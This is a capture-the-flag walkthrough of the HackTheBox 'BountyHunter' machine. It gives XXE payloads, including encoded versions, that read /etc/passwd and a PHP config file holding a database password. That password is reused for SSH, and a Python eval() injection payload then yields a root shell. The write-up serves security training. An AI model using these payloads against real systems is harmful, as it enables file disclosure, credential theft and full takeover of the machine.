BountyHunter HackTheBox WalkThrough

This is BountyHunter HackTheBox machine walkthrough. In this writeup, I have demonstrated step-by-step how I rooted BountyHunter HackTheBox machine. Before starting let us know something about this box. It is a Linux OS box with IP address 10.10.11.100 and difficulty level Easy assigned by its maker.

First of all, connect your PC with HackTheBox VPN and confirm your connectivity with BountyHunter machine by pinging its IP 10.10.11.100. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea how we have to proceed further. Like, it helps in banner grabbing various services running over different ports and sometimes it helps in vulnerability assessment also. As usual, I have used $nmap [a popular Port Scanner] for this task and the result is given below: –

Scanning

$ sudo nmap -sC -sV -sT -p- -T4 -oN full-tcp.nmap 10.10.11.100

Full port scan revealed port no 22 and 80 as open and others shown are filtered. OpenSSH 8.2p1 on port 22 and Apache2 web server on port 80 are running. OpenSSH is not vulnerable to any vulnerability therefore our full focus will be on web exploitation i.e., on port number 80. Since web server is running over port 80 so we should have some website running over this port which can be accessed through the URL http://10.10.11.100/. Ongoing to this URL found a simple website written in php and bootstrap.

At URL http://10.10.11.100/log_submit.php found a Bounty Report System where anyone can submit the amount of bounty, he got along with its CWE id.

After capturing the request in burp after filling some dummy data found that all the entered values are firstly URL encoded then Base64 encoded.

On decoding found that all the entered values are travelling in XML format. Once I got that data is travelling in XML format then first vulnerability struck to my mind was XXE (XML External Entity Injection). Then immediately I tried to inject XXE payload and luckily got the very first payload to be executed. You can get a list of XXE payloads from here. For complete information about XXE and to solve various labs over it you can check PortSwigger article here.

Let us confirm XXE vulnerability using our payload.

Confirming XXE

Replace all the values of data parameter with the values given below or as shown in the screenshot below.

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE bugreport [<!ENTITY payload SYSTEM "file:///etc/passwd">]><bugreport><title>&payload;</title><cwe>234</cwe><cvss>10</cvss><reward>10000</reward></bugreport>

Once we have replaced the data values then we need to encode it using base64 and then URL encode.

The encoded payload is

%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%69%42%6c%62%6d%4e%76%5a%47%6c%75%5a%7a%30%69%56%56%52%47%4c%54%67%69%50%7a%34%4b%49%43%41%67%50%43%46%45%54%30%4e%55%57%56%42%46%49%47%4a%31%5a%33%4a%6c%63%47%39%79%64%43%42%62%43%69%41%67%49%44%77%68%52%55%35%55%53%56%52%5a%49%48%42%68%65%57%78%76%59%57%51%67%55%31%6c%54%56%45%56%4e%49%43%4a%6d%61%57%78%6c%4f%69%38%76%4c%32%56%30%59%79%39%77%59%58%4e%7a%64%32%51%69%50%6c%30%2b%43%69%41%67%49%43%41%38%59%6e%56%6e%63%6d%56%77%62%33%4a%30%50%67%6f%67%49%43%41%67%50%48%52%70%64%47%78%6c%50%69%5a%77%59%58%6c%73%62%32%46%6b%4f%7a%77%76%64%47%6c%30%62%47%55%2b%43%69%41%67%49%43%41%38%59%33%64%6c%50%6a%49%7a%4e%44%77%76%59%33%64%6c%50%67%6f%67%49%43%41%67%50%47%4e%32%63%33%4d%2b%4d%54%41%38%4c%32%4e%32%63%33%4d%2b%43%69%41%67%49%43%41%38%63%6d%56%33%59%58%4a%6b%50%6a%45%77%4d%44%41%77%50%43%39%79%5a%58%64%68%63%6d%51%2b%43%69%41%67%49%43%41%38%4c%32%4a%31%5a%33%4a%6c%63%47%39%79%64%44%34%3d

We can clearly see the passwd file in the above burp response. Let us try to dump the content of db.php file. I got this file after performing directory bruteforcing at URL http://10.10.11.100/.

Since it is a php file therefore we can’t read it because it gets executed when we try to see its content. To retrieve its content, we have to use php wrapper php://filter/convert.base64-encode/resource. This wrapper will convert the content of php file into base64 and then dump it on the screen. For more info about php wrappers check this article. Let us change our payload to retrieve the content of file db.php.

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE bugreport [<!ENTITY payload SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php">]><bugreport><title>&payload;</title><cwe>234</cwe><cvss>10</cvss><reward>10000</reward></bugreport>

Then Base64 and URL encode it respectively.

The encoded payload will look like as given below.

%50%44%39%34%62%57%77%67%64%6d%56%79%63%32%6c%76%62%6a%30%69%4d%53%34%77%49%69%42%6c%62%6d%4e%76%5a%47%6c%75%5a%7a%30%69%56%56%52%47%4c%54%67%69%50%7a%34%4b%49%43%41%67%49%44%77%68%52%45%39%44%56%46%6c%51%52%53%42%69%64%57%64%79%5a%58%42%76%63%6e%51%67%57%77%6f%67%49%43%41%67%50%43%46%46%54%6c%52%4a%56%46%6b%67%63%47%46%35%62%47%39%68%5a%43%42%54%57%56%4e%55%52%55%30%67%49%6e%42%6f%63%44%6f%76%4c%32%5a%70%62%48%52%6c%63%69%39%6a%62%32%35%32%5a%58%4a%30%4c%6d%4a%68%63%32%55%32%4e%43%31%6c%62%6d%4e%76%5a%47%55%76%63%6d%56%7a%62%33%56%79%59%32%55%39%4c%33%5a%68%63%69%39%33%64%33%63%76%61%48%52%74%62%43%39%6b%59%69%35%77%61%48%41%69%50%6c%30%2b%43%69%41%67%49%43%41%38%59%6e%56%6e%63%6d%56%77%62%33%4a%30%50%67%6f%67%49%43%41%67%50%48%52%70%64%47%78%6c%50%69%5a%77%59%58%6c%73%62%32%46%6b%4f%7a%77%76%64%47%6c%30%62%47%55%2b%43%69%41%67%49%43%41%38%59%33%64%6c%50%6a%49%7a%4e%44%77%76%59%33%64%6c%50%67%6f%67%49%43%41%67%50%47%4e%32%63%33%4d%2b%4d%54%41%38%4c%32%4e%32%63%33%4d%2b%43%69%41%67%49%43%41%38%63%6d%56%33%59%58%4a%6b%50%6a%45%77%4d%44%41%77%50%43%39%79%5a%58%64%68%63%6d%51%2b%43%69%41%67%49%43%41%38%4c%32%4a%31%5a%33%4a%6c%63%47%39%79%64%44%34%3d

The retrieved content of db.php file is

PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=

Let us base64 decode it and see what information we got from it.

$ echo -n "PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=" | base64 -d

Some of the important information we got from above is given below.

$dbname = bounty

$dbusername = admin

$dbpassword = m19RoAU0hP41A1sTsq6K

This can’t be a publicly accessible database credential because no any port related to database is open and found during our nmap full port scan. Then I tried to use this credential to SSH into the box. I tried to use the credential development : m19RoAU0hP41A1sTsq6K and could easily logged in as user development. You can clearly see the below passwd file that user development has a login shell /bin/bash.

Let us SSH into the box using the credential development : m19RoAU0hP41A1sTsq6K.

Getting User Shell

$ ssh [email protected]

~m19RoAU0hP41A1sTsq6K

$ whoami && id

Let us capture user flag.

Capture User Flag

$ cat user.txt

Privilege Escalation

To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation. We can find PrivEsc vector either manually or using some post exploitation enumeration scripts like linpeas.sh, LinEnum.sh and there are a lot more. This time I go for manual enumeration.

Finding PrivEsc Vector

$ sudo -l 

Above $sudo -l command revealed that user development can execute the file ticketValidator.py with root permission. This file is present in the directory /opt/skytrain_inc/.

Let us see the content of this file to dig dipper into it.

$ vi /opt/skytrain_inc/ticketValidator.py

This file contains a function eval() which is considered as a dangerous function in python if not properly used. eval() is used to parse any valid python expression or simply we can say it is used to execute any valid python code passed inside it. If an attacker provides any malicious python expression to execute through it then this can lead to Python Code Injection attack.

A proper validation of data should be implemented before passing them to this function dynamically if one needs to protect his application from this attack. For more info about this attack check this article.  

Since data passed inside eval() function in above script is unsanitized so we can take advantage of it and can pass any valid python expression which helps to execute OS command. We can use the expression __import__('os').system('/bin/bash') into our script by concatenating them using and operator with other input strings. This can be our potential privilege escalation vector.

When I tried to do the same, I could easily get root shell. So here our potential PrivEsc Vector is Privilege Escalation by Python Code Injection.

Getting Root Shell

To get root shell I created a file root.md in the home directory of development user which contains the following code then simply called it while executing the file ticketValidator.py with root privilege.

# Skytrain Inc## Ticket to__Ticket Code:__**102+ 20 == 122 and __import__('os').system('/bin/bash') == True

$ vi root.md

$ cat root.md

$ sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py

# whoami && id

We have successfully got root shell. Let us capture root flag.

Capture Root Flag

# cat /root/root.txt

This was how I rooted BountyHunter HackTheBox machine. Learnt a lot after this challenge, hope you will have also learnt some new things. Thanks for reading this article. For any query and suggestion about the walkthrough feel free to write us at [email protected].